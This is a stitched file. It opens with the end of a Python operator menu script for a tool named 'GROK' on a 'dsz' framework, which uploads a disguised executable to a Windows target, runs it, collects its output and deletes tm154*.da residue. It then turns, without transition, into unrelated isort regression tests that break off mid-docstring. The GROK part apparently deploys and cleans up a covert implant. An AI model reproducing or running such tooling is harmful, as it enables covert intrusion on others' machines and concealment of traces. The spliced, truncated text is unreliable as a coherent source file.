    cdreturn(curpath)
    return bool(collectfiles(temppath))
def grokuninstall(input):
    # Menu handler: upload/run the uninstaller, collect its output, then
    # scrub any tm154*.da residue left in the temp directory.
    remote = '%s\\%s' % (systemPath, fileName)
    if not putfile('%s\\Uploads\\msgku.ex_' % GROK_PATH, remote):
        return False
    (temppath, curpath) = cdtotemp()
    if not runfile(remote):
        return False
    sleepwait()
    cdreturn(curpath)
    if not collectfiles(temppath):
        return False
    if dsz.file.Exists('tm154*.da', '%s\\..\\temp' % systemPath):
        dsz.ui.Echo('tm154*.da files exist, deleting')
        dsz.control.echo.Off()
        deleted = dsz.cmd.Run('delete -mask tm154*.da -path %s\\..\\temp' % systemPath)
        dsz.control.echo.On()
        if not deleted:
            # Best effort only: failure to scrub is reported, not fatal.
            dsz.ui.Echo('Failed to delete tm154*.da', dsz.ERROR)
    return True
def changename(input):
    """Prompt the operator for a new upload name and store it globally."""
    global fileName
    fileName = dsz.ui.GetString('New upload name for GROK:', 'help16.exe')
    dsz.ui.Echo('*** Upload name now set to %s ***' % fileName, dsz.WARNING)
def _record_result(action, retvalue):
    # Audit one menu action.  A result that is neither exactly True nor
    # exactly False records nothing (preserves the original branch pair).
    if retvalue == True:
        dsz.lp.RecordToolUse(tool, version, action, 'Successful')
    if retvalue == False:
        dsz.lp.RecordToolUse(tool, version, action, 'Unsuccessful')

def _stop_put():
    # Stop the background 'put' command without echoing the command line.
    dsz.control.echo.Off()
    dsz.cmd.Run('stop %s' % putid)
    dsz.control.echo.On()

def main():
    """Drive the interactive GROK menu until the operator exits.

    Refuses to run on non-Windows or x64 targets and when the system path
    cannot be resolved.  Returns 0 on every exit path.
    """
    menuOption = 0
    if not dsz.version.checks.IsWindows():
        dsz.ui.Echo('GROK requires a Windows OS', dsz.ERROR)
        return 0
    if dsz.version.checks.IsOs64Bit():
        dsz.ui.Echo('GROK %s requires x86' % version, dsz.ERROR)
        return 0
    if dsz.path.windows.GetSystemPath():
        global systemPath
        systemPath = dsz.path.windows.GetSystemPath()
    else:
        dsz.ui.Echo('Could not find system path', dsz.ERROR)
        return 0
    menu_list = [
        {dsz.menu.Name: 'Install', dsz.menu.Function: grokinstall},
        {dsz.menu.Name: 'Uninstall', dsz.menu.Function: grokuninstall},
        {dsz.menu.Name: 'Verify Install', dsz.menu.Function: grokverify},
        {dsz.menu.Name: 'Collect and Parse', dsz.menu.Function: grokcollect},
        {dsz.menu.Name: 'Parse Local', dsz.menu.Function: grokparse},
        {dsz.menu.Name: 'Change Upload Name', dsz.menu.Function: changename},
    ]
    while menuOption != -1:
        (retvalue, menuOption) = dsz.menu.ExecuteSimpleMenu(('\n\n========================\nGrok %s Menu\n========================\nUpload Name: %s\n' % (version, fileName)), menu_list)
        # Previously the record/stop logic below was copy-pasted per branch;
        # it is now shared via _record_result()/_stop_put().
        if menuOption == 0:
            _record_result('DEPLOYED', retvalue)
            _stop_put()
        elif menuOption == 1:
            _record_result('DELETED', retvalue)
            _stop_put()
        elif menuOption == 2:
            _record_result('EXERCISED', retvalue)
        elif menuOption == 3:
            _record_result('EXERCISED', retvalue)
            _stop_put()
        elif menuOption == 4:
            # 'Parse Local' needs no audit record or cleanup.
            pass
    dsz.ui.Echo('***************************')
    dsz.ui.Echo('* GROK script completed. *')
    dsz.ui.Echo('***************************')
    return 0
# Script entry point.
if __name__ == '__main__':
    main()
| |
"""A growing set of tests designed to ensure isort doesn't have regressions in new versions"""
from io import StringIO
import pytest
import isort
def test_isort_duplicating_comments_issue_1264():
    """Ensure isort doesn't duplicate comments when force_sort_within_sections is set to `True`
    as was the case in issue #1264: https://github.com/pycqa/isort/issues/1264
    """
    # The attached comment must appear exactly once in the sorted output.
    assert (
        isort.code(
            """
from homeassistant.util.logging import catch_log_exception
# Loading the config flow...
from . import config_flow
""",
            force_sort_within_sections=True,
        ).count("# Loading the config flow...")
        == 1
    )
def test_moving_comments_issue_726():
    """Comments attached to an import must travel with it (not detach) when
    force_sort_within_sections reorders statements.
    See: https://github.com/pycqa/isort/issues/726
    """
    test_input = (
        "from Blue import models as BlueModels\n"
        "# comment for PlaidModel\n"
        "from Plaid.models import PlaidModel\n"
    )
    assert isort.code(test_input, force_sort_within_sections=True) == test_input
    # Multiple stacked comments above a single import must also stay put.
    test_input = (
        "# comment for BlueModels\n"
        "from Blue import models as BlueModels\n"
        "# comment for PlaidModel\n"
        "# another comment for PlaidModel\n"
        "from Plaid.models import PlaidModel\n"
    )
    assert isort.code(test_input, force_sort_within_sections=True) == test_input
def test_blank_lined_removed_issue_1275():
"""Ensure isort doesn't accidentally remove blank lines after doc strings and before imports.
See: https://github.com/pycqa/isort/issues/1275
"""
assert (
isort.code(
'''"""
My docstring
"""
from b import thing
from a import other_thing
'''
)
== '''"""
My docstring
"""
from a import other_thing
from b import thing
'''
)
assert (
isort.code(
'''"""
My docstring
"""
from b import thing
from a import other_thing
''',
add_imports=["from b import thing"],
)
== '''"""
My docstring
"""
from a import other_thing
from b import thing
'''
)
def test_blank_lined_removed_issue_1283():
    """Ensure isort doesn't accidentally remove blank lines after __version__ identifiers.
    See: https://github.com/pycqa/isort/issues/1283
    """
    # Sorting must be a no-op for a dunder assignment followed by an import.
    test_input = """__version__ = "0.58.1"
from starlette import status
"""
    assert isort.code(test_input) == test_input
def test_extra_blank_line_added_nested_imports_issue_1290():
"""Ensure isort doesn't add unnecessary blank lines above nested imports.
See: https://github.com/pycqa/isort/issues/1290
"""
test_input = '''from typing import TYPE_CHECKING
# Special imports
from special import thing
if TYPE_CHECKING:
# Special imports
from special import another_thing
def func():
"""Docstring"""
# Special imports
from special import something_else
return
'''
assert (
isort.code(
test_input,
import_heading_special="Special imports",
known_special=["special"],
sections=["FUTURE", "STDLIB", "THIRDPARTY", "SPECIAL", "FIRSTPARTY", "LOCALFOLDER"],
)
== test_input
)
def test_add_imports_shouldnt_make_isort_unusable_issue_1297():
    """Test to ensure add imports doesn't cause any unexpected behaviour when combined with check
    See: https://github.com/pycqa/isort/issues/1297
    """
    # check_code must still pass when the requested import is already present.
    assert isort.check_code(
        """from __future__ import unicode_literals
from os import path
""",
        add_imports={"from __future__ import unicode_literals"},
    )
def test_no_extra_lines_for_imports_in_functions_issue_1277():
"""Test to ensure isort doesn't introduce extra blank lines for imports within function.
See: https://github.com/pycqa/isort/issues/1277
"""
test_input = """
def main():
import time
import sys
"""
expected_output = """
def main():
import sys
import time
"""
assert isort.code(isort.code(isort.code(test_input))) == expected_output
def test_no_extra_blank_lines_in_methods_issue_1293():
"""Test to ensure isort isn't introducing extra lines in methods that contain imports
See: https://github.com/pycqa/isort/issues/1293
"""
test_input = """
class Something(object):
def on_email_deleted(self, email):
from hyperkitty.tasks import rebuild_thread_cache_new_email
# update or cleanup thread # noqa: E303 (isort issue)
if self.emails.count() == 0:
...
"""
assert isort.code(test_input) == test_input
assert isort.code(test_input, lines_after_imports=2) == test_input
def test_force_single_line_shouldnt_remove_preceding_comment_lines_issue_1296():
    """Tests to ensure force_single_line setting doesn't result in lost comments.
    See: https://github.com/pycqa/isort/issues/1296
    """
    test_input = """
# A comment
# A comment
# Oh no, I'm gone
from moo import foo
"""
    # assert isort.code(test_input) == test_input
    assert isort.code(test_input, force_single_line=True) == test_input
def test_ensure_new_line_before_comments_mixed_with_ensure_newline_before_comments_1295():
    """Tests to ensure that the black profile can be used in conjunction with
    force_sort_within_sections.
    See: https://github.com/pycqa/isort/issues/1295
    """
    test_input = """
from openzwave.group import ZWaveGroup
from openzwave.network import ZWaveNetwork
# pylint: disable=import-error
from openzwave.option import ZWaveOption
"""
    # Already-sorted input must be untouched both with and without
    # force_sort_within_sections when the black profile is active.
    assert isort.code(test_input, profile="black") == test_input
    assert isort.code(test_input, profile="black", force_sort_within_sections=True) == test_input
def test_trailing_comma_doesnt_introduce_broken_code_with_comment_and_wrap_issue_1302():
"""Tests to assert the combination of include_trailing_comma and a wrapped line doesnt break.
See: https://github.com/pycqa/isort/issues/1302.
"""
assert (
isort.code(
"""
from somewhere import very_very_very_very_very_very_long_symbol # some comment
""",
line_length=50,
include_trailing_comma=True,
)
== """
from somewhere import \\
very_very_very_very_very_very_long_symbol # some comment
"""
)
def test_ensure_sre_parse_is_identified_as_stdlib_issue_1304():
    """Ensure sre_parse is identified as STDLIB.
    See: https://github.com/pycqa/isort/issues/1304.
    """
    assert (
        isort.place_module("sre_parse") == isort.place_module("sre") == isort.settings.STDLIB # type: ignore # noqa
    )
def test_add_imports_shouldnt_move_lower_comments_issue_1300():
    """Ensure add_imports doesn't move comments immediately below imports.
    See: https://github.com/pycqa/isort/issues/1300.
    """
    test_input = """from __future__ import unicode_literals
from os import path
# A comment for a constant
ANSWER = 42
"""
    # Re-adding an import that already exists must leave the file untouched.
    assert isort.code(test_input, add_imports=["from os import path"]) == test_input
def test_windows_newline_issue_1277():
"""Test to ensure windows new lines are correctly handled within indented scopes.
See: https://github.com/pycqa/isort/issues/1277
"""
assert (
isort.code("\ndef main():\r\n import time\r\n\n import sys\r\n")
== "\ndef main():\r\n import sys\r\n import time\r\n"
)
def test_windows_newline_issue_1278():
"""Test to ensure windows new lines are correctly handled within indented scopes.
See: https://github.com/pycqa/isort/issues/1278
"""
assert isort.check_code(
"\ntry:\r\n import datadog_agent\r\n\r\n "
"from ..log import CheckLoggingAdapter, init_logging\r\n\r\n init_logging()\r\n"
"except ImportError:\r\n pass\r\n"
)
def test_check_never_passes_with_indented_headings_issue_1301():
"""Test to ensure that test can pass even when there are indented headings.
See: https://github.com/pycqa/isort/issues/1301
"""
assert isort.check_code(
"""
try:
# stdlib
import logging
from os import abc, path
except ImportError:
pass
""",
import_heading_stdlib="stdlib",
)
def test_isort_shouldnt_fail_on_long_from_with_dot_issue_1190():
"""Test to ensure that isort will correctly handle formatting a long from import that contains
a dot.
See: https://github.com/pycqa/isort/issues/1190
"""
assert (
isort.code(
"""
from this_is_a_very_long_import_statement.that_will_occur_across_two_lines\\
.when_the_line_length.is_only_seventynine_chars import (
function1,
function2,
)
""",
line_length=79,
multi_line_output=3,
)
== """
from this_is_a_very_long_import_statement.that_will_occur_across_two_lines"""
""".when_the_line_length.is_only_seventynine_chars import (
function1,
function2
)
"""
)
def test_isort_shouldnt_add_extra_new_line_when_fass_and_n_issue_1315():
"""Test to ensure isort doesnt add a second extra new line when combining --fss and -n options.
See: https://github.com/pycqa/isort/issues/1315
"""
assert isort.check_code(
"""import sys
# Comment canary
from . import foo
""",
ensure_newline_before_comments=True, # -n
force_sort_within_sections=True, # -fss
show_diff=True, # for better debugging in the case the test case fails.
)
assert (
isort.code(
"""
from . import foo
# Comment canary
from .. import foo
""",
ensure_newline_before_comments=True,
force_sort_within_sections=True,
)
== """
from . import foo
# Comment canary
from .. import foo
"""
)
def test_isort_doesnt_rewrite_import_with_dot_to_from_import_issue_1280():
    """Test to ensure isort doesn't rewrite imports in the form of import y.x into from y import x.
    This is because they are not technically fully equivalent to each other and can introduce broken
    behaviour.
    See: https://github.com/pycqa/isort/issues/1280
    """
    # All four spellings must be preserved verbatim, side by side.
    assert isort.check_code(
        """
import test.module
import test.module as m
from test import module
from test import module as m
""",
        show_diff=True,
    )
def test_isort_shouldnt_introduce_extra_lines_with_fass_issue_1322():
"""Tests to ensure isort doesn't introduce extra lines when used with fass option.
See: https://github.com/pycqa/isort/issues/1322
"""
assert (
isort.code(
"""
import logging
# Comment canary
from foo import bar
import quux
""",
force_sort_within_sections=True,
ensure_newline_before_comments=True,
)
== """
import logging
# Comment canary
from foo import bar
import quux
"""
)
def test_comments_should_cause_wrapping_on_long_lines_black_mode_issue_1219():
"""Tests to ensure if isort encounters a single import line which is made too long with a comment
it is wrapped when using black profile.
See: https://github.com/pycqa/isort/issues/1219
"""
assert isort.check_code(
"""
from many_stop_words import (
get_stop_words as get_base_stopwords, # extended list of stop words, also for en
)
""",
show_diff=True,
profile="black",
)
def test_comment_blocks_should_stay_associated_without_extra_lines_issue_1156():
"""Tests to ensure isort doesn't add an extra line when there are large import blocks
or otherwise warp the intent.
See: https://github.com/pycqa/isort/issues/1156
"""
assert (
isort.code(
"""from top_level_ignored import config # isort:skip
####################################
# COMMENT BLOCK SEPARATING THESE #
####################################
from ast import excepthandler
import logging
"""
)
== """from top_level_ignored import config # isort:skip
import logging
####################################
# COMMENT BLOCK SEPARATING THESE #
####################################
from ast import excepthandler
"""
)
def test_comment_shouldnt_be_duplicated_with_fass_enabled_issue_1329():
"""Tests to ensure isort doesn't duplicate comments when imports occur with comment on top,
immediately after large comment blocks.
See: https://github.com/pycqa/isort/pull/1329/files.
"""
assert isort.check_code(
"""'''
Multi-line docstring
'''
# Comment for A.
import a
# Comment for B - not A!
import b
""",
force_sort_within_sections=True,
show_diff=True,
)
def test_wrap_mode_equal_to_line_length_with_indendet_imports_issue_1333():
assert isort.check_code(
"""
import a
import b
def function():
import a as b
import c as d
""",
line_length=17,
wrap_length=17,
show_diff=True,
)
def test_isort_skipped_nested_imports_issue_1339():
"""Ensure `isort:skip are honored in nested imports.
See: https://github.com/pycqa/isort/issues/1339.
"""
assert isort.check_code(
"""
def import_test():
from os ( # isort:skip
import path
)
""",
show_diff=True,
)
def test_windows_diff_too_large_misrepresentative_issue_1348(test_path):
"""Ensure isort handles windows files correctly when it come to producing a diff with --diff.
See: https://github.com/pycqa/isort/issues/1348
"""
diff_output = StringIO()
isort.file(test_path / "example_crlf_file.py", show_diff=diff_output)
diff_output.seek(0)
assert diff_output.read().endswith(
"-1,5 +1,5 @@\n+import a\r\n import b\r\n" "-import a\r\n \r\n \r\n def func():\r\n"
)
def test_combine_as_does_not_lose_comments_issue_1321():
    """Test to ensure isort doesn't lose comments when --combine-as is used.
    See: https://github.com/pycqa/isort/issues/1321
    """
    test_input = """
from foo import * # noqa
from foo import bar as quux # other
from foo import x as a # noqa
import operator as op # op comment
import datetime as dtime # dtime comment
from datetime import date as d # dcomm
from datetime import datetime as dt # dtcomm
"""
    # Comments of combined aliases are merged with '; ' onto the joint line.
    expected_output = """
import datetime as dtime # dtime comment
import operator as op # op comment
from datetime import date as d, datetime as dt # dcomm; dtcomm
from foo import * # noqa
from foo import bar as quux, x as a # other; noqa
"""
    assert isort.code(test_input, combine_as_imports=True) == expected_output
def test_combine_as_does_not_lose_comments_issue_1381():
    """Test to ensure isort doesn't lose comments when --combine-as is used.
    See: https://github.com/pycqa/isort/issues/1381
    """
    test_input = """
from smtplib import SMTPConnectError, SMTPNotSupportedError # important comment
"""
    assert "# important comment" in isort.code(test_input, combine_as_imports=True)
    # Same guarantee for type-checker pragmas.
    test_input = """
from appsettings import AppSettings, ObjectSetting, StringSetting # type: ignore
"""
    assert "# type: ignore" in isort.code(test_input, combine_as_imports=True)
def test_incorrect_grouping_when_comments_issue_1396():
"""Test to ensure isort groups import correct independent of the comments present.
See: https://github.com/pycqa/isort/issues/1396
"""
assert (
isort.code(
"""from django.shortcuts import render
from apps.profiler.models import Project
from django.contrib.auth.decorators import login_required
from django.views.generic import (
# ListView,
# DetailView,
TemplateView,
# CreateView,
# View
)
""",
line_length=88,
known_first_party=["apps"],
known_django=["django"],
sections=["FUTURE", "STDLIB", "DJANGO", "THIRDPARTY", "FIRSTPARTY", "LOCALFOLDER"],
)
== """from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from django.views.generic import \\
TemplateView # ListView,; DetailView,; CreateView,; View
from apps.profiler.models import Project
"""
)
assert (
isort.code(
"""from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from apps.profiler.models import Project
from django.views.generic import ( # ListView,; DetailView,; CreateView,; View
TemplateView,
)
""",
line_length=88,
known_first_party=["apps"],
known_django=["django"],
sections=["FUTURE", "STDLIB", "DJANGO", "THIRDPARTY", "FIRSTPARTY", "LOCALFOLDER"],
include_trailing_comma=True,
multi_line_output=3,
force_grid_wrap=0,
use_parentheses=True,
ensure_newline_before_comments=True,
)
== """from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from django.views.generic import ( # ListView,; DetailView,; CreateView,; View
TemplateView,
)
from apps.profiler.models import Project
"""
)
def test_reverse_relative_combined_with_force_sort_within_sections_issue_1395():
    """Test to ensure reverse relative combines well with other common isort settings.
    See: https://github.com/pycqa/isort/issues/1395.
    """
    # Single-dot relative import must sort before the double-dot one when
    # reverse_relative is on, alongside a pile of unrelated settings.
    assert isort.check_code(
        """from .fileA import a_var
from ..fileB import b_var
""",
        show_diff=True,
        reverse_relative=True,
        force_sort_within_sections=True,
        order_by_type=False,
        case_sensitive=False,
        multi_line_output=5,
        sections=["FUTURE", "STDLIB", "THIRDPARTY", "FIRSTPARTY", "APPLICATION", "LOCALFOLDER"],
        lines_after_imports=2,
        no_lines_before="LOCALFOLDER",
    )
def test_isort_should_be_able_to_add_independent_of_doc_string_placement_issue_1420():
"""isort should be able to know when an import requested to be added is sucesfully added,
independent of where the top doc string is located.
See: https://github.com/PyCQA/isort/issues/1420
"""
assert isort.check_code(
'''"""module docstring"""
import os
''',
show_diff=True,
add_imports=["os"],
)
def test_comments_should_never_be_moved_between_imports_issue_1427():
    """isort should never move comments to a different import statement.
    See: https://github.com/PyCQA/isort/issues/1427
    """
    # The noqa comment belongs to the star import and must stay there.
    assert isort.check_code(
        """from package import CONSTANT
from package import * # noqa
""",
        force_single_line=True,
        show_diff=True,
    )
def test_isort_doesnt_misplace_comments_issue_1431():
"""Test to ensure isort wont misplace comments.
See: https://github.com/PyCQA/isort/issues/1431
"""
input_text = """from com.my_lovely_company.my_lovely_team.my_lovely_project.my_lovely_component import (
MyLovelyCompanyTeamProjectComponent, # NOT DRY
)
from com.my_lovely_company.my_lovely_team.my_lovely_project.my_lovely_component import (
MyLovelyCompanyTeamProjectComponent as component, # DRY
)
"""
assert isort.code(input_text, profile="black") == input_text
def test_isort_doesnt_misplace_add_import_issue_1445():
"""Test to ensure isort won't misplace an added import depending on docstring position
See: https://github.com/PyCQA/isort/issues/1445
"""
assert (
isort.code(
'''#!/usr/bin/env python
"""module docstring"""
''',
add_imports=["import os"],
)
== '''#!/usr/bin/env python
"""module docstring"""
import os
'''
)
assert isort.check_code(
'''#!/usr/bin/env python
"""module docstring"""
import os
''',
add_imports=["import os"],
show_diff=True,
)
def test_isort_doesnt_mangle_code_when_adding_imports_issue_1444():
"""isort should NEVER mangle code. This particularly nasty and easy to reproduce bug,
caused isort to produce invalid code just by adding a single import statement depending
on comment placement.
See: https://github.com/PyCQA/isort/issues/1444
"""
assert (
isort.code(
'''
"""module docstring"""
''',
add_imports=["import os"],
)
== '''
"""module docstring"""
import os
'''
)
def test_isort_float_to_top_with_sort_on_off_tests():
"""Characterization test for current behaviour of float-to-top on isort: on/off sections.
- imports in isort:off sections stay where they are
- imports in isort:on sections float up, but to the top of the isort:on section (not the
top of the file)"""
assert (
isort.code(
"""
def foo():
pass
import a
# isort: off
import stays_in_section
x = 1
import stays_in_place
# isort: on
def bar():
pass
import floats_to_top_of_section
def baz():
pass
""",
float_to_top=True,
)
== """import a
def foo():
pass
# isort: off
import stays_in_section
x = 1
import stays_in_place
# isort: on
import floats_to_top_of_section
def bar():
pass
def baz():
pass
"""
)
to_sort = """# isort: off
def foo():
pass
import stays_in_place
import no_float_to_to_top
import no_ordering
def bar():
pass
"""
# No changes if isort is off
assert isort.code(to_sort, float_to_top=True) == to_sort
def test_isort_doesnt_float_to_top_correctly_when_imports_not_at_top_issue_1382():
"""isort should float existing imports to the top, if they are currently below the top.
See: https://github.com/PyCQA/isort/issues/1382
"""
assert (
isort.code(
"""
def foo():
pass
import a
def bar():
pass
""",
float_to_top=True,
)
== """import a
def foo():
pass
def bar():
pass
"""
)
assert (
isort.code(
"""
def foo():
pass
import a
def bar():
pass
""",
float_to_top=True,
)
== """import a
def foo():
pass
def bar():
pass
"""
)
assert (
isort.code(
'''"""My comment
"""
def foo():
pass
import a
def bar():
pass
''',
float_to_top=True,
)
== '''"""My comment
"""
import a
def foo():
pass
def bar():
pass
'''
)
assert (
isort.code(
'''
"""My comment
"""
def foo():
pass
import a
def bar():
pass
''',
float_to_top=True,
)
== '''
"""My comment
"""
import a
def foo():
pass
def bar():
pass
'''
)
assert (
isort.code(
'''#!/bin/bash
"""My comment
"""
def foo():
pass
import a
def bar():
pass
''',
float_to_top=True,
)
== '''#!/bin/bash
"""My comment
"""
import a
def foo():
pass
def bar():
pass
'''
)
assert (
isort.code(
'''#!/bin/bash
"""My comment
"""
def foo():
pass
import a
def bar():
pass
''',
float_to_top=True,
)
== '''#!/bin/bash
"""My comment
"""
import a
def foo():
pass
def bar():
pass
'''
)
def test_empty_float_to_top_shouldnt_error_issue_1453():
    """isort shouldn't error when float to top is set with a mostly empty file"""
    assert isort.check_code(
        """
""",
        show_diff=True,
        float_to_top=True,
    )
    # Control: the same near-empty input also passes without float_to_top.
    assert isort.check_code(
        """
""",
        show_diff=True,
    )
def test_import_sorting_shouldnt_be_endless_with_headers_issue_1454():
"""isort should never enter an endless sorting loop.
See: https://github.com/PyCQA/isort/issues/1454
"""
assert isort.check_code(
"""
# standard library imports
import sys
try:
# Comment about local lib
# related third party imports
from local_lib import stuff
except ImportError as e:
pass
""",
known_third_party=["local_lib"],
import_heading_thirdparty="related third party imports",
show_diff=True,
)
def test_isort_should_leave_non_import_from_lines_alone_issue_1488():
"""isort should never mangle non-import from statements.
See: https://github.com/PyCQA/isort/issues/1488
"""
raise_from_should_be_ignored = """
raise SomeException("Blah") \\
from exceptionsInfo.popitem()[1]
"""
assert isort.check_code(raise_from_should_be_ignored, show_diff=True)
yield_from_should_be_ignored = """
def generator_function():
yield \\
from other_function()[1]
"""
assert isort.check_code(yield_from_should_be_ignored, show_diff=True)
wont_ignore_comment_contiuation = """
# one
# two
def function():
# three \\
import b
import a
"""
assert (
isort.code(wont_ignore_comment_contiuation)
== """
# one
# two
def function():
# three \\
import a
import b
"""
)
will_ignore_if_non_comment_continuation = """
# one
# two
def function():
raise \\
import b
import a
"""
assert isort.check_code(will_ignore_if_non_comment_continuation, show_diff=True)
yield_from_parens_should_be_ignored = """
def generator_function():
(
yield
from other_function()[1]
)
"""
assert isort.check_code(yield_from_parens_should_be_ignored, show_diff=True)
yield_from_lots_of_parens_and_space_should_be_ignored = """
def generator_function():
(
(
((((
(((((
((
(((
yield
from other_function()[1]
)))))))))))))
)))
"""
assert isort.check_code(yield_from_lots_of_parens_and_space_should_be_ignored, show_diff=True)
yield_from_should_be_ignored_when_following_import_statement = """
def generator_function():
import os
yield \\
from other_function()[1]
"""
assert isort.check_code(
yield_from_should_be_ignored_when_following_import_statement, show_diff=True
)
yield_at_file_end_ignored = """
def generator_function():
(
(
((((
(((((
((
(((
yield
"""
assert isort.check_code(yield_at_file_end_ignored, show_diff=True)
raise_at_file_end_ignored = """
def generator_function():
(
(
((((
(((((
((
(((
raise (
"""
assert isort.check_code(raise_at_file_end_ignored, show_diff=True)
raise_from_at_file_end_ignored = """
def generator_function():
(
(
((((
(((((
((
(((
raise \\
from \\
"""
assert isort.check_code(raise_from_at_file_end_ignored, show_diff=True)
def test_isort_float_to_top_correctly_identifies_single_line_comments_1499():
"""Test to ensure isort correctly handles the case where float to top is used
to push imports to the top and the top comment is a multiline type but only
one line.
See: https://github.com/PyCQA/isort/issues/1499
"""
assert (
isort.code(
'''#!/bin/bash
"""My comment"""
def foo():
pass
import a
def bar():
pass
''',
float_to_top=True,
)
== (
'''#!/bin/bash
"""My comment"""
import a
def foo():
pass
def bar():
pass
'''
)
)
assert (
isort.code(
"""#!/bin/bash
'''My comment'''
def foo():
pass
import a
def bar():
pass
""",
float_to_top=True,
)
== (
"""#!/bin/bash
'''My comment'''
import a
def foo():
pass
def bar():
pass
"""
)
)
assert isort.check_code(
"""#!/bin/bash
'''My comment'''
import a
x = 1
""",
float_to_top=True,
show_diff=True,
)
def test_isort_shouldnt_mangle_from_multi_line_string_issue_1507():
"""isort was seen mangling lines that happened to contain the word from after
a yield happened to be in a file. Clearly this shouldn't happen.
See: https://github.com/PyCQA/isort/issues/1507.
"""
assert isort.check_code(
'''
def a():
yield f(
"""
select %s from (values %%s) as t(%s)
"""
)
def b():
return (
"""
select name
from foo
"""
% main_table
)
def c():
query = (
"""
select {keys}
from (values %s) as t(id)
"""
)
def d():
query = f"""select t.id
from {table} t
{extra}"""
''',
show_diff=True,
)
def test_isort_should_keep_all_as_and_non_as_imports_issue_1523():
"""isort should keep as and non-as imports of the same path that happen to exist within the
same statement.
See: https://github.com/PyCQA/isort/issues/1523.
"""
assert isort.check_code(
"""
from selenium.webdriver import Remote, Remote as Driver
""",
show_diff=True,
combine_as_imports=True,
)
def test_isort_shouldnt_introduce_syntax_error_issue_1539():
"""isort should NEVER introduce syntax errors.
In 5.5.4 some strings that contained a line starting with from could lead to no empty paren.
See: https://github.com/PyCQA/isort/issues/1539.
"""
assert isort.check_code(
'''"""Foobar
from {}""".format(
"bar",
)
''',
show_diff=True,
)
assert isort.check_code(
'''"""Foobar
import {}""".format(
"bar",
)
''',
show_diff=True,
)
assert (
isort.code(
'''"""Foobar
from {}"""
from a import b, a
''',
)
== '''"""Foobar
from {}"""
from a import a, b
'''
)
assert (
isort.code(
'''"""Foobar
from {}"""
import b
import a
''',
)
== '''"""Foobar
from {}"""
import a
import b
'''
)
def test_isort_shouldnt_split_skip_issue_1548():
"""Ensure isort doesn't add a spurious new line if isort: skip is combined with float to top.
See: https://github.com/PyCQA/isort/issues/1548.
"""
assert isort.check_code(
"""from tools.dependency_pruning.prune_dependencies import ( # isort:skip
prune_dependencies,
)
""",
show_diff=True,
profile="black",
float_to_top=True,
)
assert isort.check_code(
"""from tools.dependency_pruning.prune_dependencies import ( # isort:skip
prune_dependencies,
)
import a
import b
""",
show_diff=True,
profile="black",
float_to_top=True,
)
assert isort.check_code(
"""from tools.dependency_pruning.prune_dependencies import # isort:skip
import a
import b
""",
show_diff=True,
float_to_top=True,
)
assert isort.check_code(
"""from tools.dependency_pruning.prune_dependencies import ( # isort:skip
a
)
import b
""",
show_diff=True,
profile="black",
float_to_top=True,
)
assert isort.check_code(
"""from tools.dependency_pruning.prune_dependencies import ( # isort:skip
)
""",
show_diff=True,
profile="black",
float_to_top=True,
)
assert isort.check_code(
"""from tools.dependency_pruning.prune_dependencies import ( # isort:skip
)""",
show_diff=True,
profile="black",
float_to_top=True,
)
assert (
isort.code(
"""from tools.dependency_pruning.prune_dependencies import ( # isort:skip
)
""",
profile="black",
float_to_top=True,
add_imports=["import os"],
)
== """from tools.dependency_pruning.prune_dependencies import ( # isort:skip
)
import os
"""
)
assert (
isort.code(
"""from tools.dependency_pruning.prune_dependencies import ( # isort:skip
)""",
profile="black",
float_to_top=True,
add_imports=["import os"],
)
== """from tools.dependency_pruning.prune_dependencies import ( # isort:skip
)
import os
"""
)
def test_isort_shouldnt_split_skip_issue_1556():
assert isort.check_code(
"""
from tools.dependency_pruning.prune_dependencies import ( # isort:skip
prune_dependencies,
)
from tools.developer_pruning.prune_developers import ( # isort:skip
prune_developers,
)
""",
show_diff=True,
profile="black",
float_to_top=True,
)
assert isort.check_code(
"""
from tools.dependency_pruning.prune_dependencies import ( # isort:skip
prune_dependencies,
)
from tools.developer_pruning.prune_developers import x # isort:skip
""",
show_diff=True,
profile="black",
float_to_top=True,
)
def test_isort_losing_imports_vertical_prefix_from_module_import_wrap_mode_issue_1542():
"""Ensure isort doesnt lose imports when a comment is combined with an import and
wrap mode VERTICAL_PREFIX_FROM_MODULE_IMPORT is used.
See: https://github.com/PyCQA/isort/issues/1542.
"""
assert (
isort.code(
"""
from xxxxxxxxxxxxxxxx import AAAAAAAAAA, BBBBBBBBBB
from xxxxxxxxxxxxxxxx import CCCCCCCCC, DDDDDDDDD # xxxxxxxxxxxxxxxxxx
print(CCCCCCCCC)
""",
multi_line_output=9,
)
== """
from xxxxxxxxxxxxxxxx import AAAAAAAAAA, BBBBBBBBBB # xxxxxxxxxxxxxxxxxx
from xxxxxxxxxxxxxxxx import CCCCCCCCC, DDDDDDDDD
print(CCCCCCCCC)
"""
)
assert isort.check_code(
"""
from xxxxxxxxxxxxxxxx import AAAAAAAAAA, BBBBBBBBBB
from xxxxxxxxxxxxxxxx import CCCCCCCCC, DDDDDDDDD # xxxxxxxxxxxxxxxxxx isort: skip
print(CCCCCCCCC)
""",
show_diff=True,
multi_line_output=9,
)
def test_isort_adding_second_comma_issue_1621():
    """Ensure isort doesnt add a second comma when very long comment is present
    See: https://github.com/PyCQA/isort/issues/1621.
    """
    # NOTE: adjacent string literals are concatenated so that the very long
    # comment line does not blow this test file's own line-length limits.
    assert isort.check_code(
        """from .test import (
    TestTestTestTestTestTest2 as TestTestTestTestTestTest1, """
        """# Some really long comment bla bla bla bla bla
)
""",
        profile="black",
        show_diff=True,
    )
    # A missing trailing comma is added exactly once.
    assert (
        isort.code(
            """from .test import (
    TestTestTestTestTestTest2 as TestTestTestTestTestTest1 """
            """# Some really long comment bla bla bla bla bla
)
""",
            profile="black",
        )
        == """from .test import (
    TestTestTestTestTestTest2 as TestTestTestTestTestTest1, """
        """# Some really long comment bla bla bla bla bla
)
"""
    )
def test_isort_shouldnt_duplicate_comments_issue_1631():
    """Comments on aliased imports must not be duplicated when the imports
    are merged.
    See: https://github.com/PyCQA/isort/issues/1631.
    """
    assert isort.check_code(
        """
import a  # a comment
import a as b  # b comment
""",
        show_diff=True,
    )
    # When the redundant `a as a` alias is removed, its comment is merged
    # onto the surviving import, not duplicated.
    assert (
        isort.code(
            """
import a  # a comment
import a as a  # b comment
""",
            remove_redundant_aliases=True,
        )
        == """
import a  # a comment; b comment
"""
    )
def test_isort_shouldnt_add_extra_new_lines_with_import_heading_issue_1670():
    """import_heading_stdlib must be idempotent: re-running isort on already
    formatted code (including an indented function-local import block) must
